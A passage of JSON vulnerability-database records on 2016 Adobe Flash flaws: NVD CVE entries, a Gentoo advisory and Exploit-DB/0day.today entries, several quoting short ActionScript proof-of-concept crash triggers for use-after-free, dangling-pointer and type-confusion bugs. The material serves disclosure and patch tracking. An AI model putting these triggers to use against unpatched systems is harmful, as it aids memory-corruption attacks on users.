"cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Heap-based buffer overflow in Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allows attackers to execute arbitrary code via unspecified vectors.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0971", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0971"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0971", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0978", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0978"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0978", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0978", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code by leveraging an unspecified \"type confusion.\"\n<a href=\"http://cwe.mitre.org/data/definitions/843.html\">CWE-843: Access of Resource Using Incompatible Type ('Type Confusion')</a>", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0985", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0985"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/o:redhat:enterprise_linux_desktop:5.0", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/o:opensuse:linux_enterprise_desktop:11", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:opensuse:nonfree:13.2", "cpe:/o:redhat:enterprise_linux_supplementary:5.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/a:opensuse:nonfree:13.1", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185", "cpe:/o:opensuse:linux_enterprise_desktop:12", "cpe:/o:opensuse:linux_enterprise_workstation_extension:12"], "id": "CVE-2016-0985", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0985", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:opensuse:linux_enterprise_desktop:12:sp1:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:linux_enterprise_workstation_extension:12:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:linux_enterprise_desktop:12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:nonfree:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:nonfree:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:linux_enterprise_desktop:11:sp4:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:linux_enterprise_workstation_extension:12:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:00", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0967", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0967"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0967", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0967", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}], "gentoo": [{"lastseen": "2016-09-06T19:46:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0993", "CVE-2016-0992", "CVE-2016-1000", "CVE-2016-0996", "CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0987", "CVE-2016-0997", "CVE-2016-0963", "CVE-2016-0962", "CVE-2016-1002", "CVE-2016-0994", "CVE-2016-0998", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0990", "CVE-2016-0969", "CVE-2016-0999", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0960", "CVE-2016-0986", "CVE-2016-0966", "CVE-2016-1001", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0995", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-1005", "CVE-2016-0988", "CVE-2016-0977", "CVE-2016-0961", "CVE-2016-1010", "CVE-2016-0989", "CVE-2016-0985", "CVE-2016-0991"], "description": "### Background\n\nThe Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Adobe Flash Player users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \"www-plugins/adobe-flash-11.2.202.577\"", "edition": 1, "modified": "2016-03-12T00:00:00", "published": "2016-03-12T00:00:00", "id": "GLSA-201603-07", "href": "https://security.gentoo.org/glsa/201603-07", "type": "gentoo", "title": "Adobe Flash Player: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-27T01:14:58", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "title": "Adobe Flash - BitmapData.drawWithQuality Heap Overflow", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0964"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25829", "id": "1337DAY-ID-25829", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=609\r\n \r\nThe attached fuzz test case causes a crash due to a heap overflow in BitmapData.drawWithQuality.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39467.zip\n\n# 0day.today [2018-01-26] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25829"}, {"lastseen": "2018-01-09T15:06:07", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "type": "zdt", "title": "Adobe Flash - ATF Processing Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0971"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25831", "id": "1337DAY-ID-25831", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=635\r\n \r\nThe attached file causes a crash due to a heap overflow, probably due to an issue in ATF processing by the URLStream class.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39465.zip\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/25831", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-11T21:57:58", "edition": 1, "description": "Exploit for multiple platform in category dos / poc", "published": "2016-02-17T00:00:00", "title": "Adobe Flash - LoadVars.decode Use-After-Free", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0974"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25833", "id": "1337DAY-ID-25833", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=667\r\n \r\nThere is a use-after-free in LoadVars.decode. If a watch is set on the object that the parameters are being decoded into, and the watch deletes the object, then other methods are called on the deleted object after it is freed. A PoC is as follows:\r\n \r\nvar lv = new LoadVars();\r\nvar f = lv.decode;\r\nvar tf = this.createTextField(\"tf\",1, 2, 3, 4, 5);\r\ntf.natalie = \"not test\";\r\ntf.watch(\"natalie\", func);\r\nf.call(tf, \"natalie=test&bob=1\");\r\ntrace(tf.natalie);\r\n \r\n \r\nfunction func(){\r\n \r\n trace(\"here\");\r\n tf.removeTextField(); \r\n return \"test\";\r\n \r\n }\r\n \r\n \r\nA sample swf and fla are attached. This issue was reproduced in Chrome on 64-bit Ubuntu.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39463.zip\n\n# 0day.today [2018-04-11] #", "sourceHref": "https://0day.today/exploit/25833", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-04T23:19:57", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "title": "Adobe Flash - H264 File Stack Corruption", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0967"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25830", "id": "1337DAY-ID-25830", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=633\r\n \r\nThe attached flv file causes stack corruption when loaded into Flash. To use the PoC, load LoadMP42.swf?file=lownull.flv from a remote server.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39466.zip\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25830"}, {"lastseen": "2018-04-09T03:43:13", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "type": "zdt", "title": "Adobe Flash - Out-of-Bounds Image Read", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0965"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25836", "id": "1337DAY-ID-25836", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=630\r\n \r\nThe attached file can cause an out-of-bounds read of an image. While the bits of the image are null, the width, height and other values can make it a valid pointer. \r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39460.zip\n\n# 0day.today [2018-04-09] #", "sourceHref": "https://0day.today/exploit/25836", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-04T17:29:48", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "title": "Adobe Flash - Sound.loadPCMFromByteArray Dangling Pointer", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0984"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25834", "id": "1337DAY-ID-25834", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=698\r\n \r\nThere is a dangling pointer that can be read, but not written to in loadPCMFromByteArray. A minimal PoC is as follows:\r\n \r\n var s = new Sound();\r\n var b = new ByteArray();\r\n for( var i = 0; i < 1600; i++){\r\n b.writeByte(1);\r\n }\r\n b.position = 0;\r\n s.loadPCMFromByteArray(b, 100, \"float\", false, 2.0);\r\n var c = new ByteArray();\r\n for(var i = 0; i < 2; i++){\r\n c.writeByte(1); \r\n }\r\n c.position = 0;\r\n try{\r\n s.loadPCMFromByteArray(c, 1, \"float\", false, 2.0);\r\n }catch(e:Error){ \r\n trace(e.message);\r\n }\r\n \r\n var d = new ByteArray();\r\n s.extract(d, 1, 0);\r\n \r\nThe PoC first loads PCM bytes correctly, setting an internal pointer to them. It then loads PCM bytes again, with a specific array length that passes the array length check, but then causes a exception to be thrown when reading the byte array. This causes the pointer to the original PCM array to be deleted, but then the function exits due to an exception before the pointer is set again. If the exception is caught, the sound object containing the dangling pointer can be used again. The sound.extract method reads directly out of the location the dangling pointer points to.\r\n \r\nA full PoC and swf are attached.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39462.zip\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/25834"}, {"lastseen": "2018-01-01T07:17:11", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2016-02-17T00:00:00", "type": "zdt", "title": "Adobe Flash - textfield Constructor Type Confusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0985"], "modified": "2016-02-17T00:00:00", "href": "https://0day.today/exploit/description/25835", "id": "1337DAY-ID-25835", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=701\r\n \r\nThere is a type confusion vulnerability in the TextField constructor in AS3. When a TextField is constructed, a generic backing object is created and reused when subsequent TextField objects are created. However, if an object with the same ID has already been created in the SWF, it can be of the wrong type. The constructor contains a check for this situation, though, and throws an exception and sets a flag to shut down the player if this occurs. The backing object is then set to be of type TextField to avoid any modifications that have been made on it by the constructor from causing problems if it is used as an object of its original type elsewhere in the player.\r\n \r\nHowever, if the exception thrown by the constructor is caught, the exception handler can create another TextField object, and since the type of the generic backing object has been changed, an object of the wrong type is now backing the TextField, which makes it possible to set the pointers in the object to integer values selected by the attacker.\r\n \r\nThe PoC swf for this issue needs to be created by hand. The original swf code is:\r\n \r\ntry{\r\n \r\n var t = new TextField();\r\n \r\n} catch(e:Error){\r\n \r\n var t2 = new TextField();\r\n t2.gridFitType;\r\n \r\n}\r\n \r\nThen in the swf, a backing object of a different type with ID 0xfff9 is created, which causes the first constructor call to fail, and the second to cause type confusion.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39461.zip\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/25835", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-21T18:25:37", "description": "Adobe Flash - BitmapData.drawWithQuality Heap Overflow. CVE-2016-0964. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - BitmapData.drawWithQuality Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0964"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39467", "href": "https://www.exploit-db.com/exploits/39467/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=609\r\n\r\nThe attached fuzz test case causes a crash due to a heap overflow in BitmapData.drawWithQuality.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39467.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39467/"}, {"lastseen": "2016-02-21T18:25:23", "description": "Adobe Flash - ATF Processing Heap Overflow. CVE-2016-0971. Dos exploits for multiple platform", "published": "2016-02-17T00:00:00", "type": "exploitdb", "title": "Adobe Flash - ATF Processing Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0971"], "modified": "2016-02-17T00:00:00", "id": "EDB-ID:39465", "href": "https://www.exploit-db.com/exploits/39465/", "sourceData": "Source: https://code.google.com/p/google-security-research/issues/detail?id=635\r\n\r\nThe attached file causes a crash due to a heap overflow, probably due to an issue in ATF processing by the URLStream class.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39465.zip\r\n\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39465/"}, {"lastseen": "2016-02-21T18:25:15", "description": "Adobe Flash - LoadVars.decode Use-After-Free. CVE-2016-0974. Dos 